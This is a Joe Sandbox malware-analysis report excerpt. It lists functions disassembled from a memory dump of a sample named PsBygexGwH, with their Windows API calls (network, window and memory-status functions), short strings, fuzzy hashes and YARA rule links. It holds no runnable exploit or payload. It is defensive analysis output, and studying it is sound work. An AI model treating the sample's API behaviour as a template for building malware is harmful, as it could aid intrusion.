Instruction ID: d5b768b576ce1493713bebbfc698578b83e52a932c1a9305a401a67fda38c525
Opcode Fuzzy Hash: 454cefad7a0b21e26fa37c1b5e18c3eeebbc1d7579dac0b6461329ae9a6b130a
Instruction Fuzzy Hash: C0E012B4C00204EFCB40AFA8E848A6DBBB1BB48310F108108F90AE7750CB385981AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00194D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00194ED4

Strings

LPT, xrefs: 00194DFB
*, xrefs: 00194E10

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: c71977a65d0d9a1a141615ac82b5f3b19dcaf1ac1b303a2502aaed7e4022fbf3
Instruction ID: 501192f71e3288f7af80a18934fdac34bd9c78489b461a16890f0cecf5b06d63
Opcode Fuzzy Hash: c71977a65d0d9a1a141615ac82b5f3b19dcaf1ac1b303a2502aaed7e4022fbf3
Instruction Fuzzy Hash: 12917175A002159FCB14DF58C484EAABBF1BF48304F198099E80A9F7A2D735ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0014E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0014E30D

Strings

pow, xrefs: 0014E2E5, 0014E302

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7218483f8b64d7c6395249ee794c77f09cd665a7621e8e69091cc26988729808
Instruction ID: 5ff6ea64886f49594c98cde2ceaf35572b825e12b51b92efecf2f61ac1178436
Opcode Fuzzy Hash: 7218483f8b64d7c6395249ee794c77f09cd665a7621e8e69091cc26988729808
Instruction Fuzzy Hash: 9C518E61A0C202D7CB167B14E9137793BE4FB50742F344968E8E58A2F9DB31CCC99A46

Uniqueness

Uniqueness Score: -1.00%

Function 0013E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0013E1B1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: fe0c4c036b17520e134753e8d6f071a05f347e3e4b7c33263d0e3d68092c9ed4
Instruction ID: d1181666c979c95bfe3371d8f6a8de631316395ec46a986dd885eee0e8599e97
Opcode Fuzzy Hash: fe0c4c036b17520e134753e8d6f071a05f347e3e4b7c33263d0e3d68092c9ed4
Instruction Fuzzy Hash: C4512335504346EFDB19DF68D481ABA7BF8EF29310F248099F8959B2D0D7349D52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0013F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0013F2BB

Strings

@, xrefs: 0013F2AF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 93fff316f6be2e31da707982c82c6b16a03fd20afe13d472a6fb5b8b49ad36de
Instruction ID: 1203bec449c4423e0ce5983f67619601798ebae293c9eda62bc3996a215808a0
Opcode Fuzzy Hash: 93fff316f6be2e31da707982c82c6b16a03fd20afe13d472a6fb5b8b49ad36de
Instruction Fuzzy Hash: 6A512872408744ABD320AF54EC86BAFBBF8FB95300F81885DF1D941195EB708579CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 001A5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001A57E0
_wcslen.LIBCMT ref: 001A57EC

Strings

CALLARGARRAY, xrefs: 001A57E6, 001A57EB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 9e04cfa05434b4351bb11b04092f64ceaa23e252a7d9d3bc88ce5173ad89c428
Instruction ID: 416c032b58f4aec6b41b6d60309fea77823b70acc799a004f2e8edaca4909b0b
Opcode Fuzzy Hash: 9e04cfa05434b4351bb11b04092f64ceaa23e252a7d9d3bc88ce5173ad89c428
Instruction Fuzzy Hash: 3541A135E042099FCB14DFA9C8819AEBBF6FF6A324F144029E505A7291E7349D81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0019D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0019D13A

Strings

|, xrefs: 0019D10B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 45e0e6504629e2dd4851d365410b3add9ff44adc7f84e4ad030dce44b6114cba
Instruction ID: 781972ecca4b06841685832290dc35deba3673ff3ac6604b652b1ed055f1f880
Opcode Fuzzy Hash: 45e0e6504629e2dd4851d365410b3add9ff44adc7f84e4ad030dce44b6114cba
Instruction Fuzzy Hash: 63315071D01219ABCF15EFA4DC85EEE7FB9FF14300F100069F815A6162DB31AA56DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 001B3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001B365C

Strings

static, xrefs: 001B35BC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 829cef6df724e74ae0f3d0fd3400422ffb372c2c95239bb0e3516ebbd459d873
Instruction ID: dfe589ad1fcbdd43233f6be7c73a19cd3ad33527cf3deb7b8bce95d22c0dee11
Opcode Fuzzy Hash: 829cef6df724e74ae0f3d0fd3400422ffb372c2c95239bb0e3516ebbd459d873
Instruction Fuzzy Hash: CE319E71110604AEDB24DF28DC80EFB73A9FF98760F008619F9A597290DB31AD91D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001B4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 001B461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001B4634

Strings

', xrefs: 001B458E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6ddb27542e125d3eac4295420cf15823ae50e1e7a2da89e8b93b9ba3611a6d14
Instruction ID: e769327421d848a2293980bbf49000e5e202a74e697e687c19c194e39916abc0
Opcode Fuzzy Hash: 6ddb27542e125d3eac4295420cf15823ae50e1e7a2da89e8b93b9ba3611a6d14
Instruction Fuzzy Hash: DD311974A01719AFDF14CFA9C990BEA7BB5FF49300F14806AE905AB352D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001B31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001B327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001B3287

Strings

Combobox, xrefs: 001B3249

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 6cc007db906cee0e07b735102bc676481a6f99752645e869975a039b9f747770
Instruction ID: 3c7bb358b7228ec09a722b532d67cc8b40e91571c67d300117e8f20eee6a185b
Opcode Fuzzy Hash: 6cc007db906cee0e07b735102bc676481a6f99752645e869975a039b9f747770
Instruction Fuzzy Hash: 2211B2713002087FFF259E94DC81EFB376AEB983A4F104268F92897290D7719D6197A0

Uniqueness

Uniqueness Score: -1.00%

Function 001B3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0012600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
Part of subcall function 0012600E: GetStockObject.GDI32(00000011), ref: 00126060
Part of subcall function 0012600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A

GetWindowRect.USER32(00000000,?), ref: 001B377A
GetSysColor.USER32(00000012), ref: 001B3794

Strings

static, xrefs: 001B3757

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: d0f5c556eea77c5b298616049e6bdcf286305dd99a349ab4f55e30be2b0a54df
Instruction ID: 2519ea942ebe5b0fa94b612d29346e261d0d3222e61cf1f29654bb0eff81a1a1
Opcode Fuzzy Hash: d0f5c556eea77c5b298616049e6bdcf286305dd99a349ab4f55e30be2b0a54df
Instruction Fuzzy Hash: D9113AB2610209AFDF01DFA8CC45EFA7BB8FB08354F004614F965E2250EB35E861DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0019CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0019CDA6

Strings

<local>, xrefs: 0019CD66

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1c0d2e7a66333bf155d631bc247098875157f16a5e8451a07c482ccc6fc790b1
Instruction ID: 3d89e3ceab5eb84ec7097a315a1e02c22fbd1e3bb6a1ea9f6f71de9e06cd7645
Opcode Fuzzy Hash: 1c0d2e7a66333bf155d631bc247098875157f16a5e8451a07c482ccc6fc790b1
Instruction Fuzzy Hash: 7211E9B12056317ADB384BA68C45FF7BEECEF127A4F004236B18983080D7709840D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 001B3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 001B34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001B34BA

Strings

edit, xrefs: 001B348F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 233a0c57d009f9b320c6c7822957a10efe9b3a379e6fbac1f670aab1d5bee0cf
Instruction ID: 34f194d2f4b4f6db1e041d68d08ced9b04da00cea9c3ff5b36f8dcbe5a77fa57
Opcode Fuzzy Hash: 233a0c57d009f9b320c6c7822957a10efe9b3a379e6fbac1f670aab1d5bee0cf
Instruction Fuzzy Hash: C1114C71100208AFEB228E68DC84AFB376AEF15778F504724F975971E0C771DDA1ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00186C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

CharUpperBuffW.USER32(?,?,?), ref: 00186CB6
_wcslen.LIBCMT ref: 00186CC2

Strings

STOP, xrefs: 00186CBC, 00186CC1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 79702c0264cf213b17e27f61b80cc914aef9eda76907344944e0206933e1f880
Instruction ID: 26e6f6d827eed9a1b4395703e94907208e2042201380220f1eb09504cb6b1444
Opcode Fuzzy Hash: 79702c0264cf213b17e27f61b80cc914aef9eda76907344944e0206933e1f880
Instruction Fuzzy Hash: 3F01C4326105268BCB21BFFDDC809BF77A5FB71754B510624E85296190EB31DA50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00181CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00181D4C

Strings

ListBox, xrefs: 00181D16
ComboBox, xrefs: 00181CEB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c61962aef6434021a05a85b449809b2c4d1ba8c6d03969cf95acd2ad3407669d
Instruction ID: afa74852dde76010a6493aff7c72d0f7149893868877651ceded167787b40480
Opcode Fuzzy Hash: c61962aef6434021a05a85b449809b2c4d1ba8c6d03969cf95acd2ad3407669d
Instruction Fuzzy Hash: 4B01B576601228ABCB08FBA4DC55DFE7369FB56750F040A1AA832572C1EB305A198BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00181BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00181C46

Strings

ListBox, xrefs: 00181C10
ComboBox, xrefs: 00181BE5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: b96a8b0742f66a973254bd12775ab8367673615c3ad4d9480a1651914e02b075
Instruction ID: b08a3bd724af52a3ad91f57c7d4d9386891fa565985f39ee6412a4854e7aa1b7
Opcode Fuzzy Hash: b96a8b0742f66a973254bd12775ab8367673615c3ad4d9480a1651914e02b075
Instruction Fuzzy Hash: CD01A776A8111877CB08FB94D951DFF77ADAB25740F140019B41667281EB209F199BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00181C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00181CC8

Strings

ListBox, xrefs: 00181C94
ComboBox, xrefs: 00181C69

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c9df3f20c7c365e438608a7679f4078f944f59e61d378d1e5b79ec8252608e1d
Instruction ID: daaca96e6bc86e75cf760890416129e71249685d3f1cfc2eebcc0b92e0094e2e
Opcode Fuzzy Hash: c9df3f20c7c365e438608a7679f4078f944f59e61d378d1e5b79ec8252608e1d
Instruction Fuzzy Hash: 4A01F9B6B8011877CB04FBA5DA11EFF73ADAB21740F540015B80277281EB609F19DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00181D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 00183CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00183CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00181DD3

Strings

ListBox, xrefs: 00181DA0
ComboBox, xrefs: 00181D75

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3e0d9def03b26ebbefea80517ac309334f5d49ec47f74105b34468ccc6bf9863
Instruction ID: 046341cec10c43a98572ecaaf23cb175ee43c934b497c0f302c90a80e5d17d23
Opcode Fuzzy Hash: 3e0d9def03b26ebbefea80517ac309334f5d49ec47f74105b34468ccc6bf9863
Instruction Fuzzy Hash: 50F0A472A4122877DB08F7E8DC56FFE776CAB11750F480A15B822672C1EB605A198B60

Uniqueness

Uniqueness Score: -1.00%

Function 001A747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001A7493
_wcslen.LIBCMT ref: 001A74B9

Strings

3, 3, 16, 1, xrefs: 001A7483

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 4af36cf9bf2a1f5c281537610731853790dd0115f214fc403684a2e2735e4537
Instruction ID: 8f82b0d93a5e32117c56cd9afc8b749eff4ebaabd9240fa15287f6b5ae6bed68
Opcode Fuzzy Hash: 4af36cf9bf2a1f5c281537610731853790dd0115f214fc403684a2e2735e4537
Instruction Fuzzy Hash: 40E02B0A21422011D231127AECC1A7F57CDDFDE750710182BF985C22F6EF948E92A3A0

Uniqueness

